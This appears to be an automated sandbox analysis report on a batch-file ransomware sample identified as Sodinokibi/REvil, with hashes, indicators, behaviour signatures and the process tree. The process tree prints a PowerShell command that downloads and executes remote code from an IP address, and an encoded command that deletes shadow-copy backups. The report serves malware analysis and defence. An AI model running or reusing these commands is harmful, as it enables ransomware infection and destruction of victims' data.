Analysis
-
max time kernel
35s -
max time network
54s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
25-05-2020 23:10
Static task
static1
Behavioral task
behavioral1
Sample
57b8d7c9360eb6128db3304dcfb1f349.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
57b8d7c9360eb6128db3304dcfb1f349.bat
Resource
win10v200430
General
-
Target
57b8d7c9360eb6128db3304dcfb1f349.bat
-
Size
216B
-
MD5
289f5081ad9d2578da55acb1a22535d0
-
SHA1
f326802298635d66b7d8bc9c84ee9f9e2dd6b870
-
SHA256
704944436e9ff0dff889481902b320ce73c1479d15bfddadeba11eccc9de1f4c
-
SHA512
5eb166eade908fbbb9d6baacd2cda114d06620644b8082f6f2c2cd5918b2f4d1b18fae626cf6a609014f376c431972a846a22db36dfbb341b5aa025e1fa37e4d
Malware Config
Extracted
http://185.103.242.78/pastes/57b8d7c9360eb6128db3304dcfb1f349
Extracted
C:\qq5z97o6-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/E9A5298CB4C3D401
http://decryptor.cc/E9A5298CB4C3D401
Signatures
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1368 powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 880 wrote to memory of 1368 880 cmd.exe powershell.exe PID 1368 wrote to memory of 1020 1368 powershell.exe powershell.exe PID 1368 wrote to memory of 1020 1368 powershell.exe powershell.exe PID 1368 wrote to memory of 1020 1368 powershell.exe powershell.exe PID 1368 wrote to memory of 1020 1368 powershell.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1368 powershell.exe Token: SeDebugPrivilege 1368 powershell.exe Token: SeDebugPrivilege 1020 powershell.exe Token: SeBackupPrivilege 1840 vssvc.exe Token: SeRestorePrivilege 1840 vssvc.exe Token: SeAuditPrivilege 1840 vssvc.exe Token: SeTakeOwnershipPrivilege 1368 powershell.exe -
Suspicious behavior: EnumeratesProcesses 77 IoCs
Processes:
powershell.exepowershell.exepid process 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1020 powershell.exe 1020 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe -
Enumerates connected drives 3 TTPs
-
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 1 1368 powershell.exe -
Drops file in Program Files directory 16 IoCs
Processes:
powershell.exedescription ioc process File created \??\c:\program files\qq5z97o6-readme.txt powershell.exe File opened for modification \??\c:\program files\OutRegister.potx powershell.exe File opened for modification \??\c:\program files\TraceLock.mov powershell.exe File opened for modification \??\c:\program files\UnpublishGroup.emz powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\qq5z97o6-readme.txt powershell.exe File opened for modification \??\c:\program files\SyncGrant.mpeg powershell.exe File created \??\c:\program files (x86)\qq5z97o6-readme.txt powershell.exe File opened for modification \??\c:\program files\EnableCompress.eps powershell.exe File opened for modification \??\c:\program files\LimitRestore.xlt powershell.exe File created \??\c:\program files\microsoft sql server compact edition\qq5z97o6-readme.txt powershell.exe File opened for modification \??\c:\program files\NewResume.vdx powershell.exe File opened for modification \??\c:\program files\StartConfirm.htm powershell.exe File opened for modification \??\c:\program files\RedoUpdate.ppt powershell.exe File opened for modification \??\c:\program files\SaveOut.scf powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\qq5z97o6-readme.txt powershell.exe File opened for modification \??\c:\program files\SubmitRestart.emz powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\79u32oo.bmp" powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\57b8d7c9360eb6128db3304dcfb1f349.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:880 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/57b8d7c9360eb6128db3304dcfb1f349');Invoke-TJWPIUJAW;Start-Sleep -s 10000"2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Drops file in Program Files directory
- Sets desktop wallpaper using registry
PID:1368 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1020
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1840